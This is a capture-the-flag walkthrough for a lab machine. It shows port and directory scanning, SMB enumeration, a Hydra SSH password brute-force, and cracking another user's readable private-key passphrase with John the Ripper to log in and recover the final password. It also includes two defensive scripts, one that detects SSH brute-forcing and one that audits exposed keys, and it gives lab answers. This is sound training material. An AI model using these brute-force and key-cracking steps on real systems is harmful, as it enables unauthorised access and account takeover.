Web App Testing and Privilege Escalation
Find the services exposed by the machine
We start with a fast Nmap scan of every TCP port, then run a more detailed scan against only the ports it finds.
nmap -p- --open -T4 -v -n 10.10.31.125
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
nmap -sC -sV -p 22,80,139,445,8009 -v -n 10.10.31.125
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1339/tcp closed kjtsiteserver
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
What is the name of the hidden directory on the web server (enter name without /)?
Going to the site there's nothing helpful, but the page source contains the comment "Check our dev note section if you need to know what to work on." That might be a hint; in any case, let's run a directory scan with Gobuster.
gobuster dir -u http://10.10.31.125 -w /usr/share/dirb/wordlists/common.txt
And sure enough, the scan found the /development directory. In there we found two notes.
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
From this we can deduce a few things: there are two potential users, J and K; the user J has a weak password (K cracked it straight out of /etc/shadow); and K has been hosting the Apache Struts 2.5.12 REST example application on this server.
User brute-forcing to find the username & password
I don't know how I was supposed to brute-force the username, but while doing reconnaissance on the SMB service I found an anonymous share that I could log into, and in it was a note with the usernames:
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
What is the username?
jan
What is the password?
Now I guess this is the part where I have to brute-force, and by process of elimination I'll brute-force the SSH service. For this I'll use Hydra; the syntax is: hydra -l [user] -P [passlist] [ip] -t 64 ssh
-t sets the number of parallel tasks.
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.31.125 -t 64 ssh
And we got a password!
[22][ssh] host: 10.10.31.125 login: jan password: armando
armando
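From the defender's side, the Hydra run above leaves a very recognisable trail in the target's sshd log: a burst of failed password attempts from one address, followed by an accepted login for the same user. The following Python script is an added example, not part of the original writeup; it parses constructed auth.log lines (the hostname basic2, the source address 10.10.14.7 and the threshold and window defaults are assumptions, not values from the room) and flags that pattern.

```python
"""Flag SSH password-guessing bursts in OpenSSH auth.log lines.

Added example, not part of the original writeup. SAMPLE_AUTH_LOG is
constructed; the hostname basic2, the source address 10.10.14.7 and the
threshold/window defaults are assumptions, not values from the room.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the default syslog format of sshd(8) on Ubuntu.
SAMPLE_AUTH_LOG = """\
Apr 23 10:00:01 basic2 sshd[1201]: Failed password for jan from 10.10.14.7 port 51002 ssh2
Apr 23 10:00:01 basic2 sshd[1202]: Failed password for jan from 10.10.14.7 port 51003 ssh2
Apr 23 10:00:02 basic2 sshd[1203]: Failed password for jan from 10.10.14.7 port 51004 ssh2
Apr 23 10:00:02 basic2 sshd[1204]: Failed password for invalid user admin from 10.10.14.7 port 51005 ssh2
Apr 23 10:00:03 basic2 sshd[1205]: Failed password for jan from 10.10.14.7 port 51006 ssh2
Apr 23 10:00:03 basic2 sshd[1206]: Accepted password for jan from 10.10.14.7 port 51007 ssh2
Apr 23 10:05:00 basic2 sshd[1300]: Failed password for kay from 10.10.14.22 port 40000 ssh2
Apr 23 11:30:00 basic2 sshd[1400]: Accepted publickey for kay from 10.10.14.22 port 40100 ssh2: RSA SHA256:placeholder
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text):
    """Return (timestamp, result, method, user, ip) tuples for sshd auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/syslog chatter is ignored
        # syslog timestamps carry no year; strptime fills in 1900, which is
        # fine for differences within a single file.
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect_bruteforce(text, threshold=4, window_seconds=60):
    """Map source IP -> report for sources with >= threshold failures in a window.

    A report also records whether that source later got an Accepted login,
    which turns "someone is guessing" into "someone guessed right".
    """
    events = parse_auth_log(text)
    failures = defaultdict(list)
    for ts, result, _method, user, ip in events:
        if result == "Failed":
            failures[ip].append((ts, user))

    reports = {}
    for ip, fails in failures.items():
        fails.sort()
        start = 0
        for end, (ts, _user) in enumerate(fails):
            # Slide the window start forward until it fits window_seconds.
            while (ts - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                reports[ip] = {
                    "failures": len(fails),
                    "users": sorted({u for _, u in fails}),
                    "burst_at": ts,
                    "success_after_burst": False,
                }
                break

    for ts, result, _method, _user, ip in events:
        if result == "Accepted" and ip in reports and ts >= reports[ip]["burst_at"]:
            reports[ip]["success_after_burst"] = True
    return reports


if __name__ == "__main__":
    for ip, report in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, report)
```

The success_after_burst flag is the signal worth paging on: a burst alone may be scanning noise, but a burst followed by an accepted password from the same source means the account is compromised and its password has to be reset, which is exactly the complaint K makes in the dev note.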
What service do you use to access the server (answer in abbreviation in all caps)?
SSH
Enumerate the machine to find any vectors for privilege escalation
I didn't find anything during a quick manual enumeration, so I'll use linPEAS, as the hint also suggests.
I don't have write permission on my home directory, so I'll transfer the script with scp to /dev/shm, a tmpfs meant for temporary files where we do have write permission.
scp ./linpeas.sh jan@10.10.31.125:/dev/shm
Then make it executable and run it:
chmod +x linpeas.sh
./linpeas.sh
linPEAS reports that kay's id_rsa private key is readable by our user.
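The finding above is the classic permissions mistake: a private key that any local user can read is as good as that user's password. The following Python script is an added example, not part of the original writeup or of linPEAS; it audits a constructed home-directory tree (the users kay and jan, the 0644 mode and the placeholder key bodies are all made up here) for private keys with group or other permission bits set, and tightens them to 0600.

```python
"""Audit home directories for SSH private keys that other users can read.

Added example, not part of the original writeup. build_demo_homes() creates
a throwaway tree that mirrors the linPEAS finding (a 0644 id_rsa in another
user's ~/.ssh); the user names and modes are constructed. On a real host the
equivalent quick check is roughly:
    find /home -path '*/.ssh/*' -type f ! -name '*.pub' ! -perm 600 -ls
"""
import os
import stat
import tempfile

PRIVATE_KEY_MARKER = b"PRIVATE KEY-----"


def is_private_key(path):
    """True if the file starts with a PEM/OpenSSH private key header."""
    with open(path, "rb") as fh:
        first_line = fh.readline()
    return first_line.startswith(b"-----BEGIN") and PRIVATE_KEY_MARKER in first_line


def audit_ssh_keys(home_root):
    """Return [(path, octal_mode)] for private keys with any group/other bits set."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        for name in sorted(os.listdir(ssh_dir)):
            path = os.path.join(ssh_dir, name)
            st = os.lstat(path)  # lstat: never follow a planted symlink
            if not stat.S_ISREG(st.st_mode) or not is_private_key(path):
                continue
            mode = stat.S_IMODE(st.st_mode)
            # Anything beyond owner rw means the key leaks to other local users
            # (given that the home and .ssh directories are traversable, as here).
            if mode & (stat.S_IRWXG | stat.S_IRWXO):
                findings.append((path, oct(mode)))
    return findings


def remediate(findings):
    """Tighten each flagged key to 0600 and return the resulting modes."""
    fixed = []
    for path, _old_mode in findings:
        os.chmod(path, 0o600)
        fixed.append((path, oct(stat.S_IMODE(os.stat(path).st_mode))))
    return fixed


def build_demo_homes():
    """Constructed tree: kay's id_rsa is 0644 (the finding); jan's is 0600."""
    root = tempfile.mkdtemp(prefix="homes_")
    for user, mode in (("kay", 0o644), ("jan", 0o600)):
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key = os.path.join(ssh_dir, "id_rsa")
        with open(key, "wb") as fh:
            fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                     b"constructed placeholder, not a real key\n"
                     b"-----END OPENSSH PRIVATE KEY-----\n")
        os.chmod(key, mode)
        with open(key + ".pub", "w") as fh:  # the public half is fine to share
            fh.write("ssh-rsa AAAA-placeholder %s\n" % user)
    return root


if __name__ == "__main__":
    root = build_demo_homes()
    found = audit_ssh_keys(root)
    for path, mode in found:
        print("exposed private key: %s (mode %s)" % (path, mode))
    print("after remediation:", remediate(found))
```

The audit identifies keys by their header rather than by file name, so a copy left as backup.key or id_rsa.bak is caught as well. Directory permissions matter too: a 0700 ~/.ssh would have blocked this read even with a lax file mode, so a real audit checks both.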
What is the name of the other user you found (all lower case)?
Checking the /home directory, we can see that it is:
kay
If you have found another user, what can you do with this information?
Since we know that kay's id_rsa key is readable, let's try to crack its passphrase with John the Ripper.
First, we convert it to a format that john understands with ssh2john:
ssh2john id_rsa > hash
Then we crack the passphrase with:
john --wordlist=/usr/share/wordlists/rockyou.txt hash
This gave us:
beeswax (id_rsa)
Now let's try to connect as this user.
Remember to set the permissions on the copied id_rsa key, since ssh refuses to use a private key that is readable by others:
chmod 600 id_rsa
And now we connect with:
ssh -i id_rsa kay@10.10.31.125
We enter the passphrase we cracked, and we are in!
What is the final password you obtain?
Now that we are in, we can read the file pass.bak that we saw earlier in the enumeration phase; it contains this password:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$